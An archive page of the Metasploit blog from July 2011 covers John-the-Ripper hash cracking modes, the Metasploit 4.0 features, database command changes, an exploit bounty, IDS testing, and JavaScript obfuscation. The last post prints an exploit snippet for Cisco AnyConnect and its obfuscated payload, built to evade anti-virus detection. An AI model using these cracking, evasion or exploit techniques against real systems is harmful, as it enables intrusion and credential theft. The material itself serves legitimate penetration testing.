Skip navigation
All Places > Metasploit > Blog > 2011 > July
2011

HDM recently added password cracking functionality to Metasploit through the inclusion of John-the-Ripper in the Framework. The 'auxiliary/analyze/jtr_crack_fast' module was created to facilitate JtR's usage in Framework and directly into Express/Pro's automated collection routine. The module works against known Windows hashes (NTLM and LANMAN). It uses hashes in the database as input, so make sure you've run hashdump with a database connected to your Framework instance (Pro does this automatically) before running the module. The module collects the hashes in the database and passes them to the john binaries that are now (r13135) included in Framework via a generated PWDUMP-format file.

 

Several JtR modes are utilized for quick and targeted cracking. First, wordlist mode: The generated wordlist consists of the standard john wordlist with known usernames, passwords, and hostnames appended. A ruleset based on the Korelogic mutation rules is then used to generate mutations of these words. You can find the msf version of these rules here.

 

Once the initial wordlist bruting is complete, incremental bruting rules, aptly named All4 & Digits5, are used to brute force additional combinations. These rulesets are shown below and can be found in the same john.conf configuration file in the Framework.

 

Cracked values are appended to the wordlist as they're found. This is beneficial :

  1. Previously-cracked hashes are pulled from the john.pot at the start of a run and these passwords are used as seed values for subsequent runs.
  2. Mutation rules are applied to cracked passwords, possibly enabling other previously-uncracked hashes to be broken.

 

Finally, discovered username/password combinations are reported to the database and associated with the host / service.

 

Cracking modes:

--wordlist=<ourgenerated wordlist> --rules single --format=lm

--incremental=All4--format=lm

--incremental=Digits5--format=lm

--wordlist=<ourgenerated wordlist> --rules single --format=ntlm

--incremental=All4--format=ntlm

--incremental=Digits5--format=lm

 

Incremental Rulesets:

[Incremental:All4]

File = $JOHN/all.chr

MinLen = 0

MaxLen = 4

CharCount = 95

 

[Incremental:Digits5]

File =$JOHN/digits.chr

MinLen = 1

MaxLen = 5

CharCount = 10

 

As with everything in the framework, it's subject to patches and improvement, so make sure to check the code. Thanks to mubix for several edits. This info is current as of July 27, 2011.

 

UPDATE: Check out KoreLogic's upcoming Defcon 19 password cracking contest if you're interested in this stuff!

ckirsch

Metasploit 4.0 is coming soon!

Posted by ckirsch Jul 26, 2011

EthicalHackerRegistration.jpgIt'll only be days until you can download the new Metasploit version 4.0!

 

The new version marks the inclusion of 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules, all added since the release of version 3.7.1 in May 2011. These additions include nine new SCADA exploits, improved 64-bit Linux payloads, exploits for Firefox and Internet Explorer, full-HTTPS and HTTP Meterpreter stagers, and post-exploitation modules for dumping passwords from Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and many other applications. All of these these improvements are available in all Metasploit editions - the free and open source Metasploit Framework, as well as the commercial editions Metasploit Pro and Metasploit Express.

 

As usual, we'll have several blog posts about developments to the Metasploit Framework in the coming weeks. In this post, I'd like to focus on some of the new features in the commercial editions. Metasploit Pro 4.0 is all about greater enterprise integration, cloud deployment options, and penetration testing automation. The best news for customers holding a valid license for Metasploit Express or Metasploit Pro: you’ll be able to upgrade free of charge. Here are some of the features in Metasploit Pro 4.0:

 

Make Metasploit Pro an integral part of your risk intelligence solution

 

  • New third-party import filters: You can now import scan results from more than a dozen third-party web application scanners and additional vulnerability assessment tools to prioritize vulnerabilities and eliminate false positives (see full list of supported import formats).
  • Deeper integration with NeXpose: While Metasploit provides only a file import option for third-party scanners, integrate directly with one or more NeXpose scan engines to start a scan or to verify results. This is particularly useful to organizations that have deployed NeXpose as an enterprise solution. As a result, organizations can streamline the verification of vulnerabilities and reduce their remediation costs.The integration is provided through officially supported, publicly documented APIs.
  • Vulnerability Management List Editing: Add, modify, and delete vulnerability information directly through the product user interface to tweak imported data base on verification results and add additional findings as needed.
  • SIEM integration interface: Integrate Metasploit Pro with your Security Information and Event Management (SIEM) system through the RPC API and open XML format to get a better picture of your risk landscape.
  • Automated security tests: Programmatically remote control Metasploit Pro through a new RPC programming interface to verify vulnerabilities or test systems.

 

Deploy Metasploit Pro in a way that works for you

 

  • Pre-packaged images for VMware vSphere: You can now deploy Metasploit as a VMware image using VMware vSphere. This decreases provisioning costs for vulnerability programs covering remote locations. The OVF format is also compatible with other virtualization solutions.
  • Amazon Machine Image: If you need to conduct external penetration tests, you can easily deploy Metasploit in the Amazon Elastic Compute Cloud (EC2). Metasploit is available as an Amazon Machine Image (AMI) and payment for the hosting costs can be processed through Amazon Web Services (AWS) accounts, making provisioning quick and easy, even with small budgets.

 

Boost your penetration tests

 

  • Persistent agents and listeners: During a penetration test, mobile users and temporary network problems can cause established sessions to drop. Re-running the same exploit may not always lead to another session (or even be possible). Meterpreter now supports persistent agents and listeners so that the target machine actively re-establishes a session when it drops. Agents automatically expire after a pre-configured amount of time.
  • Macros: Write macros that get triggered by certain events. For example, if you launch a social engineering campaign, you won’t know when an email user will click on a link or open a malicious attachment, so it is not practical to wait for someone to do so and create a session. Using post-exploitation macros, you can automate what happens once a target user falls into a social engineering trap. For example, the macro could automatically loot the machine or carry out a set of pre-defined steps. Macros can chain together are arbitrary post-exploitation modules and be extended through custom post-exploitation modules.
  • Exploit replay: You can now replay all previously successful attacks. This makes verification of patch installation and configurations changes trivial. This also allows the export from one Metasploit copy to be used in a later verification through another copy.
  • Offline password cracking: As a result of Rapid7’s sponsorship of the open-source project John the Ripper, Metasploit Pro now automatically cracks weak passwords during the evidence collection phase, making it possible to replay these passwords across multiple machines and protocols.

 

Inform stakeholders and document compliance with updated reports

 

  • FISMA reports: Easily document compliance with FISMA through a new report that maps findings to controls and requirements.
  • More visual reports: Metasploit Pro reports now contain charts and diagrams that visualize the results of a penetration tests.

 

Other new features include

 

  • Increased exploitation speed
  • Updated social engineering campaigns, including the ability to clone existing websites and edit HTML in a rich editor
  • Updated user interface to simplify managing large projects
  • Easily re-run tasks that have been aborted by the user
  • Global settings for configuring NeXpose scan engines, macros, and API keys

 

If you're a Metasploit Express customer and would like to know which of these features are included in your edition, please see the Metasploit Compare & Download  page.

 

Metasploit 4.0 will be available for download in August 2011. If you can't wait that long, register for an exclusive sneak preview with HD Moore this Thursday to see the new Metasploit Pro 4.0 in action!

-->The Metasploit Framework is continuously updated and version 4.0 marks the inclusion of 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules, all added since the release of version 3.7.1 in May 2011. These additions include nine new SCADA exploits, improved 64-bit Linux payloads, exploits for Firefox and Internet Explorer, full-HTTPS and HTTP Meterpreter stagers, and post-exploitation modules for dumping passwords from Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and many other applications. For more information on the ongoing development of the Metasploit Framework, please visit the Metasploit blog

Are you an artist?  Do you possess mad ASCII art skills?  Do you like the idea of having your artwork on the face of an open source project that's one of the world's largest, de-facto standard for penetration testing with more than one million unique downloads per year?  Then read on!

 

One of the first things many people likely noticed when updating to the Metasploit Framework version 4.0-testing was the new ASCII art. In addition to all the new awesome features we have been adding to Metasploit lately we wanted to give Metasploit a new look and appearance. When version 4.0-test first came out we had roughly 5 or 6 new banners. Slowly we have been adding to that number.  Now is your chance to make your mark on the Metasploit Project.

 

The Metasploit team would like to encourage the talented folks from every corner of the community to join the ASCII art fun, and submit your most awesome, creative banners to us. All submissions should be uploaded to either Metasploit Redmine (http://dev.metasploit.com), or e-mailed to msfdev@metasploit.com. If selected, your artwork will be committed in our banner.rb file, together with the following banners that we currently have:

 

Metasploit-Matrix.pngmissle_command.png

Kernel panic.pngR7-Metasploit.png3Kom Superhack.pngI Love Shells.pngMetasploit Bull.pngModern Cowsay.png

 

For questions, as always, please feel free to drop by our IRC channel (#metasploit on irc.freenode.net).

Early in the 3.x days, metasploit had support for using databases through plugins.  As the project grew, it became clear that tighter database integration was necessary for keeping track of the large amount of information a pentester might encounter during an engagement.  To support that, we moved database functionality into the core, to be available whenever a database was connected and later added postgres to the installer so that functionality could be used out of the box.  Still, the commands for dealing with the database and information stored there were sort of second-class citizens, all beginning with a "db_" prefix.  We recently addressed this issue for the upcoming 4.0 release.

 

Commands that query the database have lost their "db_" prefix, while those that deal with managing the DB itself have retained it. For example, "db_hosts" is now just "hosts" and "db_status" remains the same. The idea behind this change is that hosts (and other entities) don't really have anything to do with the database other than the fact that they are stored there. Additionally, the deprecated db_import_*, db_create, and db_destroy have been removed.

 

The remaining commands have been improved by expanding search abilities and standardizing option parsing.  So where you previously had to type full IP addresses to list more than one host, now all commands that search the database take hosts in nmap host specification format, and all of them that deal with services can take ports similarly. Furthermore, the options have been standardized a bit so -p always means port, -s always means service name.

 

Example usage for the services command:

 

msf > services 192.168.1-10.1,3,5 -p 22-25,80,443,445 192.168.99.0/24

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.99.1     22    tcp    ssh   open
192.168.99.141   445   tcp    smb   open   Windows XP Service Pack 2 (language: Unknown) (name:XP-SP2) (domain:WORKGROUP)
192.168.100.129  445   tcp    smb   open   Unix Samba 3.4.7 (language: Unknown) (name:FOO) (domain:FOO)

msf >

 

The new changes also make it really easy to find services running on odd ports

 

msf auxiliary(ssh_version) > services -s ssh

Services
========

host            port  proto  name  state  info
----            ----  -----  ----  -----  ----
192.168.17.134  21    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  23    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  80    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  443   tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  1433  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  8080  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  8443  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  9022  tcp    ssh   open   SSH-2.0-OpenSSH_4.4

msf >

 

An often requested feature is the ability to run a module against hosts in the database that match certain criteria.  That is now possible for scanner modules with the hosts and services commands' new -R flag (and --rhosts) which sets RHOSTS to the list of hosts returned.  If the result is more than 5 hosts, it makes options pretty hard to read, so Metasploit writes it out to a temporary file like so:

 

msf auxiliary(ssh_version) > services -s ssh --rhosts

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.87.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.87.119   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
192.168.87.122   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.87.126   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.140   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
192.168.87.145   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.158   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.88.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.89.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.90.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.90.61    22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.93.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.96.1     22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
192.168.96.134   22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
192.168.98.131   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 FreeBSD-20080901

RHOSTS => file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0

msf auxiliary(ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting                                   Required  Description
   ----     ---------------                                   --------  -----------
   RHOSTS   file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0  yes       The target address range or CIDR identifier
   RPORT    22                                                yes       The target port
   THREADS  254                                               yes       The number of concurrent threads
   TIMEOUT  30                                                yes       Timeout for the SSH probe

Another way to make dealing with all that data easier is through the use of workspaces.  Workspaces have been around for awhile, but they are an underused feature that allows you to seperate hosts, credentials, etc. for each engagement into their own silo.  Every piece of data that metasploit records is associated with the current workspace, so it's quite easy to keep related information together and segregate different engagements by switching workspaces.

 

The command by itself will list available workspaces, the current one marked with an asterisk:

 

msf > workspace
  default
* engagement_A
  engagement_B
  engagement_C
  the_whole_friggin_internet

 

You can change the current workspace with workspace <name>.  For extra convenience, names are tab-completable, too.  You can add new workspaces with -a or delete existing ones with -d.  Note that -d assumes you really meant it and will happily delete the whole thing (including hosts, credentials, loot, and all) without prompting.

 

The journey from a glued-on appendage, to a main feature only used by db_autopwn, to a core feature integrated with the whole framework has been an adventure.  I think the result is easier access to information, better seperation of that data, and a smoother, faster pentest.

After more than 30 days of hardcore and intense exploit hunting, the Metasploit Bounty program has finally come to an end. First off, we'd like to say that even though the Metasploit Framework has made exploit development much easier, the process is not always an easy task. We're absolutely amazed how hard our participants tried to make magic happen.

 

Often, the challenge begins with finding the vulnerable software. If you're lucky, you can find what you need from 3rd-party websites that mirror different versions of the application, or you can download the trial version from the vendor (that is, if the trial version is still vulnerable).  If you can't find it this way, well, good luck getting your hands on it. This process alone can sometimes take more time than writing the exploit.  Unfortunately, quite a few of our participants gave up at this phase.

 

The next thing you do is gather as much information as possible about the vulnerability (CVE, OSVDB, ZDI, mailing lists, blogs, vendor's bug tracking system, etc). Reverse engineer the protocol or file format you're working with, find the root-cause by using whatever techniques (patch diffing, source code auditing, fuzzing, injection, etc), and then try to trigger a crash... hopefully a good one.  In two occasions, thanks to Joshua J. Drake, Jon Butler, and Carlos' reversing-fu, we found out that CVE-2011-0657 (MS11-030) and CVE-2011-1206 (IBM Tivoli LDAP) are most likely non-exploitable. Even if a vulnerability is not exploitable, the effort spent trying to exploit it is not wasted. Often times the experience of attempting a difficult exploit can be a great learning experience, and sharing that experience gives other people insight into the real impact of the vulnerability.

 

Once you have a nice crash, you try to exploit the bug and gain code execution.  Exploitation is all about precision, and there are many things you have to consider to get reliable code execution, which means there are many ways you can fail: bad heap layout, overwrite a freed object with an incorrect size, some variable on the stack you forgot to account for, overwrite a RET address, SEH, or a ROP gadget with an address that changes with every install, every service pack, or every patch level, etc, etc. Sometimes, you don't even realize that until you start throwing the exploit against all your VMs.  If that's the case, you go back and fix it... or worst case scenario, you rewrite four or five times just to get it right.  And that sucks!

 

Keep in mind that all this hard work had to be done within one week, and many of the participants could only do it in their spare time.  But of course, some lucky fews were blessed by other people from the security community with exploit writing, the Metasploit team also received assistance from fellow hackers with the vetting process.  To those who helped, you know who you are -- THANK YOU!:-)   But again, we would also like to thank the following people for participating, the amount of participation we saw was unexpected and greatly appreciated (for those who specified a nickname, that's the name you'll be listed here):

 

  • BH
  • Alino
  • Joshua J. Drake
  • glitch07
  • kc57
  • Lepke
  • HeadlessZeke
  • hal
  • diedthreetimes
  • woFF
  • Abysssec
  • Lincoln&  Corelanc0d3r
  • "hidden"
  • kralor
  • mog
  • axtaxt
  • rusko
  • AmonAmarth
  • Rob
  • Patrick Webster
  • Boris
  • xero_
  • nebojsa
  • Jon Butler
  • mr_me
  • cons0ul
  • Juan Vazquez
  • Mark Scrano

 

Lastly, as planned, we will move on to the paying phase. And for those who are going to Las Vegas for Black Hat / Defcon, we will see you there :-)

One of my key objectives for developing the new vSploit modules was to test network devices such as Snort. Snort or Sourcefire enterprise products are widely deployed in enterprises, so Snort can safely be considered the de-facto standard when it comes to intrusion detection systems (IDS). So much that even third-party intrusion detection systems often import Snort rules.

 

Organizations are often having a tough time verifying that their IDS deployment actually work as intended, which is why I created several vSploit modules to test whether Snort sensors are seeing certain traffic. Since vSploit modules were made to trigger Snort alerts, they don't obfuscate attacks to avoid detection.

 

However, not every rule is used in every environment. For example, if you aren't using Microsoft Frontpage on your network, you likely won't want to use Snort's Frontpage rules. On the other hand, if you are running Frontpage you may not want to try exploiting it because it may affect the production system. Because of Metasploit Framework's flexibility, you can use the vSploit Generic HTTP Server module to host a small web server that answers all testing requests, so production systems won't be affected.

 

You can run vSploit modules with a mix of Metasploit Framework, Metasploit Pro, and Metasploit Express, providing there is end-to-end network connectivity to the vSploit instances:

 

2011-07-08_1602.png

 

 

 

To try out the new vSploit modules, start up the vSploit Generic HTTP Server.

 

2011-07-08_1531_001.png

Then launch Frontpage-related attack attributes:

 

2011-07-08_1531.png

 

Verify that the packets are being transmitted in Wireshark:

 

2011-07-08_1542.png

 

Finally, verify that Snort IDS sees the activity:

 

2011-07-08_1551.png

 

Metasploit vSploit Modules will be released at DEFCON 19.

As of this writing, Metasploit has 152 browser exploits. Of those, 116 use javascript either to trigger the vulnerability or as a means to control the memory layout of the browser process [1]. Right now most of that javascript is static. That makes it easier for anti-virus and IDS folks to signature. That makes it less likely for you to get a shell.

 

Skape recognized this problem several years ago and added Rex::Exploitation::ObfuscateJS to address it. This first-gen obfuscator was based on substituting static strings which requires a priori knowledge of what you want to substitute, meaning you need to take care of variable names. Changes to the code need to be reflected in the calls to obfuscate() and anything you miss will remain static. It also means that you have to ensure variable names don't end up in a string or elsewhere where they might get inadvertantly smashed. To overcome these limitations, several modules employ a simple technique of using random values for javascript vars but they lose out on string manipulations.

 

Enter RKelly, a pure-ruby javascript lexer. Having a full parser gives us a lot more power than the previous obfuscation techniques available in the framework. For one, it gives us type information for literals, which makes string and number mangling really easy.  While a particular static ROP chain might be easy to fingerprint, that same string can be easily represented numerous ways through javascript manipulations. Some of the ideas for mangling literals came from Drivesploit with several new techniques thrown in as well. There's even a wrapper class, Rex::Exploitation::JSObfu for dealing with it. Syntax is simlar to it's older cousin, but without the need for klunky lists of varnames to replace.

 

Here's an example from windows/browser/cisco_anyconnect_exec:

    js = ::Rex::Exploitation::JSObfu.new %Q|
      var x = document.createElement("object"); 
      x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
      x.url = "#{url}/#{dir}/";
    |
    js.obfuscate
    html = "<html>\n<script>\n#{js}\n</script>\n</html>"


 

And the html as delivered to a browser:

<html>
<script>
var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);
</script>
</html>

Of course, this will be different for each request.

 

So now a call to arms. We could use some help testing 116 browser exploits to see if javascript obfuscation is viable and several issues make that more challenging. For one, getting ahold of the vulnerable software is sometimes quite difficult. Also, in some cases where the vulnerability has very restrictive memory layout requirements, obfuscation may break the exploit.

 

What we need is people with old browsers and old plugins/toolbars/etc who can:

  • Modify exploit modules to use the new obfuscation techniques
  • Test their changes against as many versions of the vulnerable software as possible
  • Test their changes against any anti-virus that claims to protect web browsing

If you're interested in helping out, contact me in #metasploit on FreeNode, or @egyp7 on twitter.

 

 

[1] Gathered with the following commands:

  $ ls modules/exploits/*/browser/*.rb | wc -l
  152
  $ ls modules/exploits/*/browser/*.rb | xargs grep '<script' | wc -l
  116

Filter Blog

By date: By tag: